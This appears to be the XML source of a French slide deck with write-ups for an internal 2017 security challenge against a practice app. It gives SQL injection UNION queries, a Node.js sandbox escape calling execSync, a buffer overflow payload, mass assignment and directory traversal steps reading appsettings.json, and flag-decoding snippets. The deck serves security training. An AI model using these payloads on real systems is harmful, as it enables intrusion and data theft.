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62" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="273" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="276" r:id="rId10"/>
    <p:sldId id="277" r:id="rId11"/>
    <p:sldId id="278" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="280" r:id="rId15"/>
    <p:sldId id="258" r:id="rId16"/>
    <p:sldId id="260" r:id="rId17"/>
    <p:sldId id="281" r:id="rId18"/>
    <p:sldId id="282" r:id="rId19"/>
    <p:sldId id="283" r:id="rId20"/>
    <p:sldId id="284" r:id="rId21"/>
    <p:sldId id="287" r:id="rId22"/>
    <p:sldId id="288" r:id="rId23"/>
    <p:sldId id="261" r:id="rId24"/>
    <p:sldId id="291" r:id="rId25"/>
    <p:sldId id="271" r:id="rId26"/>
    <p:sldId id="292" r:id="rId27"/>
    <p:sldId id="274" r:id="rId28"/>
    <p:sldId id="293" r:id="rId29"/>
    <p:sldId id="296" r:id="rId30"/>
    <p:sldId id="298" r:id="rId31"/>
    <p:sldId id="294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5A3BCF4-48B7-4219-8955-0923C447B976}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Section récapitulative" id="{38513901-85E3-4499-BDBB-E34FDA02555B}">
          <p14:sldIdLst>
            <p14:sldId id="262"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Step 1" id="{D3D83F7A-BA90-4E2B-984B-BC89754314E8}">
          <p14:sldIdLst>
            <p14:sldId id="257"/>
            <p14:sldId id="273"/>
            <p14:sldId id="266"/>
            <p14:sldId id="272"/>
            <p14:sldId id="268"/>
            <p14:sldId id="276"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="270"/>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Step 2" id="{DD898C2D-C432-48EA-83E4-934662304A3C}">
          <p14:sldIdLst>
            <p14:sldId id="258"/>
            <p14:sldId id="260"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="283"/>
            <p14:sldId id="284"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Step 3" id="{2EAD1F0A-9B9E-481D-B38F-0C1676382711}">
          <p14:sldIdLst>
            <p14:sldId id="261"/>
            <p14:sldId id="291"/>
            <p14:sldId id="271"/>
            <p14:sldId id="292"/>
            <p14:sldId id="274"/>
            <p14:sldId id="293"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Ending" id="{FB2E9B24-84D0-4334-822C-2AE648CABF5E}">
          <p14:sldIdLst>
            <p14:sldId id="296"/>
            <p14:sldId id="298"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Trash" id="{3819762E-9709-4595-BDF1-2D6E6CB80F30}">
          <p14:sldIdLst>
            <p14:sldId id="29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2" autoAdjust="0"/>
    <p:restoredTop sz="77253" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="1101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7238-BE6A-4CCA-AC0C-E3CEEBD63A34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9946B-75F2-4A08-BAE3-E3B475C00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1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14H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55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1,2,3,4,5,6 FROM dual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4, 5, 6 --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information_schema.tables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CONCAT(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'.',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information_schema.columns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Content,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test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77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ILSpy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JustDecompile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>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24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3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Scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> les 4 scan-codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>Les remettre dans le bon ordre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>Base64 -&gt; ASCII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84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14h30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44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33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68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417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46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55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877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491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088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16H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81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486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Immediately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>Invoked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> Expression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122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Utiliser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>cartman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> en pseudo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>Utiliser la clé </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>id_rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> et l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>easter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>egg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> précédent comme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>mdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> de déchiffrement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>Shell JS avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>vorpal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>, 5 commandes dispo : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>, date, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>launchnb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>, help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>Chacune des commandes de `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>` est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>checké</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>sandboxé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> et exécuté sur le serveur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" baseline="0" dirty="0"/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isPrototypeOf.constructor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("return process.mainModule.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_${process.constructor.name}`).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execSync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`)")().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()'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148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 file exploit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 set startup-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 r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objdump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-t ./exploit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 ./exploit |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grep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faille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(python -c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"A"*344 + "\x16\x07\x40\x00\x00\x00\x00\x00"';cat) | ./exploit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023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Ajouter le cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>adminCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>=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SGVsbG8sIGMnZXN0IFJlbWksIGFuY2llbiBkZSBsYSB0ZWFtIHNlY3UK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21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16h30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484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16h30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73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404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8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1,2,3,4,5,6 FROM dual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4, 5, 6 --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information_schema.tables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CONCAT(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'.',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information_schema.columns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Content,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test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07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54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93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41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première ligne n’est pas nécessaire c’est la même chose que la première épreuve mais en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obfusqué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 : on peut quand même la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désobfusquer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 l’aide de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b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sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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chrome</a:t>
            </a:r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 flag = [49, 71, 120, 112, 53, 73, 120, 112, 50, 71, 120, 112, 100, 72, 120, 112, 52, 71, 120, 112, 99, 74, 120, 112, 56, 72, 120, 112, 49, 73, 120, 112, 49, 75, 120, 112, 57, 71, 120, 112, 49, 71, 120, 112, 100, 72, 120, 112, 51, 71, 120, 112, 57, 73, 120, 112, 56, 73, 120, 112, 54, 73, 120, 112, 98, 72, 120, 112, 57, 71, 120, 112, 54, 72, 120, 112, 101, 72, 120, 112, 54, 74, 120, 112, 101, 72, 120, 112, 55, 72, 120, 112, 100, 72, 120, 112, 52, 75, 120, 112, 51, 75, 120, 112, 53, 73, 120, 112, 100, 72, 120, 112, 53, 71, 120, 112, 101, 72, 120, 112, 54, 72, 120, 112, 53, 73, 120, 112];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flag.reverse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= [];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(var i = 0; i &lt;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flag.length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i++) {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input.push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% 2 ? flag[i] : flag[i] - 20);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= "";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input.forEach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(x) { l +=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String.fromCharCode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});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copier-coller la string dans la console qui nous converti directement en texte "clair"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("UFN5MUstMGNfNF9KVXY3M19qQHl4M2U1")</a:t>
            </a:r>
          </a:p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il s'agit d'un rot-13 donc il suffit de faire l'opération inverse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1,2,3,4,5,6 FROM dual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4, 5, 6 --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information_schema.tables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CONCAT(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'.',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information_schema.columns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Content,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test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56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1,2,3,4,5,6 FROM dual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4, 5, 6 --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information_schema.tables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CONCAT(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'.',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column_name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information_schema.columns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table_schema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cflixdb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-- test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UNION SELECT 1, 2, Content, 4, 5, 6 FROM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test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9946B-75F2-4A08-BAE3-E3B475C00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60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cap="none" spc="15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Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interne SI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Graphique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0823" y="326215"/>
            <a:ext cx="1398880" cy="13211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7" name="Graphique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0823" y="326215"/>
            <a:ext cx="1398880" cy="13211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-92015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82623"/>
            <a:ext cx="7973291" cy="5897562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93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072993" y="-1654"/>
            <a:ext cx="6119007" cy="6859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72995" y="2059012"/>
            <a:ext cx="6115829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994" y="2059012"/>
            <a:ext cx="6115830" cy="1826267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993" y="4010334"/>
            <a:ext cx="6119007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72991" y="6356349"/>
            <a:ext cx="41148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Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interne SI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87792" y="6356350"/>
            <a:ext cx="11660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10" name="Graphique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5" y="1117460"/>
            <a:ext cx="4851141" cy="45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85325" cy="758824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175435"/>
            <a:ext cx="10515600" cy="400152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602F04E-BBC1-4C53-86AE-0A7FCBA5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23950"/>
            <a:ext cx="9585325" cy="542925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="fr-FR" sz="2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1952283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18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680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85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0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681" y="284176"/>
            <a:ext cx="9561793" cy="863306"/>
          </a:xfrm>
        </p:spPr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681" y="2175434"/>
            <a:ext cx="10512613" cy="4042485"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="182880" indent="-360000">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="411480" indent="-360000">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="640080" indent="-360000">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="868680" indent="-360000">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1097280" indent="-360000">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="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Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interne SI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98A6173-660D-4289-943C-613CEBF198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681" y="1147483"/>
            <a:ext cx="9561793" cy="502024"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="fr-FR" sz="280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718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762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45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98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38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072993" y="-1654"/>
            <a:ext cx="6119007" cy="6859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72995" y="2059012"/>
            <a:ext cx="6115829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818" y="2059012"/>
            <a:ext cx="6119006" cy="1826267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cap="none" spc="150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993" y="4010334"/>
            <a:ext cx="6119007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Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interne SI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10" name="Graphique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5" y="1117460"/>
            <a:ext cx="4851140" cy="45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5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9" name="Graphique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0823" y="326215"/>
            <a:ext cx="1398880" cy="132116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Challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interne SI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8" name="Graphique 7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0823" y="326215"/>
            <a:ext cx="1398880" cy="13211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3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78788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B69D2-AD00-4357-992D-CF19E194B738}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>19/04/2018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62B59-E36A-4BE9-A7C6-67EF10739413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Graphique 13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60823" y="326215"/>
            <a:ext cx="1398879" cy="13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png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08chalen001/cooki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5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6221362" y="2098287"/>
            <a:ext cx="5760026" cy="1529816"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" dirty="0"/>
              <a:t>Challenge interne sécurité SI 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphique 1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3665" y="4398032"/>
            <a:ext cx="4422298" cy="944344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Graphique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275" y="1117460"/>
            <a:ext cx="4851140" cy="45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5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BugFinder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683F242-F0B6-4588-A1AD-87FF37ACF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A1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>SQLi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39213" y="2212258"/>
            <a:ext cx="4579374" cy="2993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Breaking Bad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Revenir sur l’accueil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Exploiter le champ de recherche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Déterminer le nb de colonnes et leurs types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Découvrir la structure de la BDD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Récupérer les bons champs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37" y="2045272"/>
            <a:ext cx="7225466" cy="4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2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Reflection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/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ouvrir Black Mirror</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyser la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-trace trouvée avant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Aller sur V:/AR/CFlix/ …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Récupérer la DLL et l’analyser à l’aide d’un outil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Extraire la ressource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Cflix.settings</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dézipper le fichier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ouvrir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>appsetting.json</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>That’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> all !</a:t>
            </a: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11B16B-10FA-4F86-BD4D-5364C2C41E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A5 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/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030" y="3023816"/>
            <a:ext cx="1833255" cy="1833255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5" descr="Une image contenant chose, objet&#10;&#10;Description générée avec un niveau de confiance élevé">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB687268-E96F-4709-A3D7-86957B527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79" y="5786631"/>
            <a:ext cx="4672665" cy="7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85325" cy="1258958"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Write-up : Jeu d’enfant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60" y="2388382"/>
            <a:ext cx="10054679" cy="3145762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphique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" y="4525069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7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85325" cy="1272605"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Write-up : L’éthique des barmans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886" y="4525069"/>
            <a:ext cx="1833255" cy="1833255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique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167" y="2057898"/>
            <a:ext cx="1746416" cy="1746416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphique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5882" y="2057898"/>
            <a:ext cx="2103958" cy="971058"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphique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7515" y="3678869"/>
            <a:ext cx="3980440" cy="895599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphique 11"/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43" t="717" r="94953" b="94947"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="928048" y="2006221"/>
            <a:ext cx="1740089" cy="175373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96886" y="3848669"/>
            <a:ext cx="281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Q0ZsMVgtaEB2M195MF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461745" y="3848669"/>
            <a:ext cx="281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VfZjB1bmRfNGwxX0gx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756241" y="3059668"/>
            <a:ext cx="281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ZGQzbl81M3IxZXNfMW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70527" y="4664443"/>
            <a:ext cx="2386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5fN2gzX3AwczczUl8/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 4" descr="Une image contenant chose&#10;&#10;Description générée avec un niveau de confiance élevé">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD83B2C-1D86-4390-84BF-537278552C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4835" y="5812536"/>
            <a:ext cx="537761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7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5" y="1117460"/>
            <a:ext cx="4851141" cy="4581633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SEMAINE #2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C’était</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> plus facile que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prévu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09062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Goût du risque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/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ouvrir L’Agence Tout Risques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Aller sur sa page profil ( /Profile/me )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Editer son profil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Forger la requête et rajouter le champ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AccountType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alpha</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>That’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> all !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2D77BF-46B5-4162-AA3E-EC7906C4F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A4 : Mass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Assignment</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphique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030" y="3023816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8038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It’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> For Life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8E77BB2-15A1-4F33-93B7-826E0A772A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A4 : Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphique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37" y="2045271"/>
            <a:ext cx="7225466" cy="4605707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E2150D2-64DB-4223-A1A4-4DE2405F792B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184245" y="2045272"/>
            <a:ext cx="4503761" cy="307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00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86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72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/>
              <a:t>Ouvrir The Walking Dead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100"/>
              <a:t>Accéder à la partie Alpha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Exploiter la directory Transversal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Lire le fichier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../appsettings.json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That’s all !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120249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36" y="2045271"/>
            <a:ext cx="7225467" cy="460570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It’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> For Life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46644B-F6D8-4E57-802C-2B57C8A12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A4 : Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphique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EFD1499-CAE5-48D7-BFCC-460713F06843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184245" y="2045272"/>
            <a:ext cx="4503761" cy="307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00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86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72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/>
              <a:t>Ouvrir The Walking Dead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100"/>
              <a:t>Accéder à la partie Alpha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Exploiter la directory Transversal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Lire le fichier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../../appsettings.json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100"/>
              <a:t>That’s all !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406752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Oh mon dieu ! Ils ont …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C5D32B5-9145-4AEC-BF74-8E05D3BF4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Social Engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphique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8" name="Image 7" descr="Une image contenant équipement électronique, intérieur, plancher&#10;&#10;Description générée avec un niveau de confiance élev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968" y="2238598"/>
            <a:ext cx="7500535" cy="4219051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D8CD7FA-B736-4967-B9D3-9B1D3B03E43D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
